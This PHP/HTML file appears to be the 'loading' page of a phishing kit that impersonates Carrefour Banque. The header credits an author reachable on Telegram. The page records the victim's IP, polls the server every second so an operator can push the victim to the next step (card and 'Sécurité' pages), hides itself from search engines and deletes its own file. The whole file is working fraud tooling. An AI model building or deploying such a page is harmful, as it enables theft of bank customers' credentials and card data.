<?php
    /*******
    Main Author: Z0N51
    Contact me on telegram : https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
    update_status(get_client_ip(),'W');
    $_SESSION['last_page'] = 'loading1';
?>
<!doctype html>
<html style="height: 100%; display: flex; flex-direction: column; background: #FFF;">

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/x-icon" href="../assets/imgs/favicon.ico" />

        <title>Informations de contact</title>
    </head>

    <body style="height: 100%; display: flex; flex-direction: column; background: #FFF;">
        
        <!-- HEADER -->
        <header id="header" class="d-flex">
            <div class="logo flex-grow-1"><img style="max-width: 103px;" src="../assets/imgs/logo.png"></div>
            <p>Informations de contact</p>
        </header>
        <!-- END HEADER -->

        <div id="steps">
            <ul>
                <li>1</li>
                <li>2</li>
                <li>3</li>
                <li>4</li>
            </ul>
        </div>

        <!-- MAIN -->
        <main id="main" class="flex-grow-1">
            <div class="left">
                <ul>
                    <li><span>1</span> Mes informations</li>
                    <li><span>3</span> Carte PASS</li>
                    <li><span>2</span> Sécurité</li>
                    <li><span>4</span> Finalisation</li>
                </ul>
            </div>
            <div class="right">
                <div class="loader">
                    <div class="spinner-border" role="status"></div>
                    <p>
                        Chargement en cours...<br>
                        Veuillez ne pas quitter la page.
                    </p>
                </div>
            </div>
        </main>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <footer id="footer">
            <div class="container">
                <p>
                    &copy; <?php echo date('Y'); ?> Carrefour Banque<br><span>Protection des données</span>
                </p>
            </div>
        </footer>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
        <script src="../assets/js/script.js"></script>

        <script>
            var z = setInterval(function () {
                $.ajax({
                    method: "GET",
                    url: '../index.php?waiting=1',
                    success: function (data) {
                        if( data !== '' ) {
                            window.location.href= '../index.php?redirection=' + data;
                        }
                    },
                });

            },1000); // 1000 = 1s
        </script>
        
    </body>

</html>
<?php unlink(basename(__FILE__)); ?>